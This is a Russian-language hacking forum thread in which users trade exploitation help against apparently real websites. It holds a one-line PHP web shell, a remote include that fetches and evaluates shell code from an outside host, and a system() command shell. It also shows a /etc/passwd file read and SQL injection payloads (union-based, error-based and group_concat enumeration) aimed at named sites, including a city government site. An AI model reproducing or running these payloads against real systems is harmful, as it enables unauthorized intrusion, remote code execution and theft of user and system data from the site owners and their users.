Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    <? assert(stripslashes($_REQUEST[cmd])); ?>

    site.com/shell.php?cmd=eval(file_get_contents('http://site.ru/textshell.txt'));
     
    2 people like this.
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Дополнение: в textshell.txt шелл должен лежать без дескрипторов <?php ?> в начале и конце.
     
    #15442 h00lyshit!, 24 Nov 2010
    Last edited: 24 Nov 2010
    3 people like this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Дополнение:Это при allow_url_fopen = on
     
    1 person likes this.
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    есть обход и этого дела :)
     
  5. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Делаю так:
    http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls -la
    и так
    http://203.101.40.168/mducorp/web/Maduraiheader.asp?fname=http://xxx.narod.ru/1.txt&c=ls
    выводит текст файла, т.е.
    <? if (!empty($_GET['c'])) { echo '<pre>'; system($_GET['c']); echo '</pre>'; }exit; ?>

    Как можно заюзать?
     
    #15445 ALIM, 24 Nov 2010
    Last edited: 24 Nov 2010
  6. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Нет это простой IFRAME.
     
    #15446 TreV@N, 24 Nov 2010
    Last edited: 24 Nov 2010
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ALIM

    1. это не инклуд, просто файл открывается в фрейме
    2. там используется технология ASP, а ты прикрепляеш пхп файл и хочеш интерпретировать )

    и 3. если ASP то там 99% винда, а ты экзекаеш команду юникс ))
     
    _________________________
    #15447 Konqi, 24 Nov 2010
    Last edited: 24 Nov 2010
    2 people like this.
  8. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Konqi

    а тут, вроде пхп?
    http://www.echoeshub.com/recordings/ew.php?fname=http://xxx.narod.ru/1.txt
     
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    ALIM
    Файлы читает
    http://www.echoeshub.com/recordings/ew.php?fname=/etc/passwd
    http://www.echoeshub.com/recordings/ew.php?fname=index.php
    http://www.echoeshub.com/recordings/ew.php?fname=jumphere.css
     
  10. h3xf0x

    h3xf0x New Member

    Joined:
    25 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Подобрал количество полей. Как я понял вывод одного поля.
    http://imperial.ca.gov/dept.php?id=-1+order+by+1
    Но если попытаться вывести поле пишет ошибку - different number of columns
    http://imperial.ca.gov/dept.php?id=-1+union+select+1
    т.е. возможно, что здесь 3 версия MySQL?
    Как нибудь инфу можно вытащить?
    Или где почитать про это можно? Спасибо.
     
  11. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    h3xf0x, в 3 union нет.
    возможно несколько запросов, методом тыка подбирайте или выплевывайте в ошибки, ну или как слепую уже крутите.

    а в title что :)

    http://imperial.ca.gov/dept.php?id=-32+union+select+version()--

    <title>:: City of Imperial - 5.0.27-community-nt ::</title>
     
    #15451 Strilo4ka, 26 Nov 2010
    Last edited: 26 Nov 2010
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Error Based метод:
    Code:
    http://imperial.ca.gov/dept.php?id=-1%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201
    
    2Strilo4ka, версия там 5.0.27-community-nt
     
    #15452 Фараон, 26 Nov 2010
    Last edited: 26 Nov 2010
  13. h3xf0x

    h3xf0x New Member

    Joined:
    25 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    О! Всем большущее спасибо! А в тайтл то я и не догадался посмотреть =)
     
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    на будущее-смотри исходный код страницы...
     
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    В таблице 59 колонок:
    http://www.site.com/index.php?id=-23+union+select+1,count(*),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=admins+--+

    59

    Запрос вывел только 33 колонки.

    http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name!='admins'+and+column_name>'NewKategorie4'+--+

    Mitgliedsnummer,
    Titel,
    VorName,
    Name,
    Firma,
    Adresse,
    PLZ,
    Ort,
    Land,
    Tel,
    Mobil,
    Fax,
    EMail,
    BCEMail,
    Internet,
    Zustelladresse,
    BName,
    Beschreibung,
    Leitspruch,
    Branche1,
    Branche2,
    Branche3,
    Branche4,
    Branche5,
    Kategorie1,
    Kategorie2,
    Kategorie3,
    Kategorie4,
    Kategorie5,
    NewKategorie1,
    NewKategorie2,
    NewKategorie3,
    NewKategorie4

    Помогите исправить ошибки в запросе, чтобы вывести остальные имена колонок в таблице через group_concat() не использую limit:

    http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name!='admins'+and+column_name>'NewKategorie4'+--+
     
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name!='admins'--

    если каунт выводит 59 эт не факт что на вывод будет колонок 59....
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    FlaktW

    http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'

    http://www.site.com/index.php?id=-23+union+select+1,group_concat(0x0b,column_name),3 ,4,5,6,7,8,9,10+from+information_schema.columns+wh ere+table_name='admins'+and+column_name>'последняя выведенная колонка в предидущем запросе'
     
    #15457 h00lyshit!, 26 Nov 2010
    Last edited: 26 Nov 2010
  18. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    FlaktW кагбэ у функции group_concat() есть ограничение в 1024 выводимых символов.
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Все повторяется..
    уже годами так.. одни и теже вопросы и ответы.. вопросы... одни и теже ответы
    + одни и теже цитаты с "sql inj. faq"

    даже это уже было уже сказано 10005000 раз..
     
    2 people like this.
  20. Kiberpank

    Kiberpank New Member

    Joined:
    26 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Мене заинтересовал такой тип атак, как переполнение буфера. Как он используется в программах я примерно понял, а вот как использовать его в интернете до меня пока не дошло :). Дайте пожалуйста пару ссылок на описание этой уязвимости и способах её реализации для новичков.
     
Thread Status:
Not open for further replies.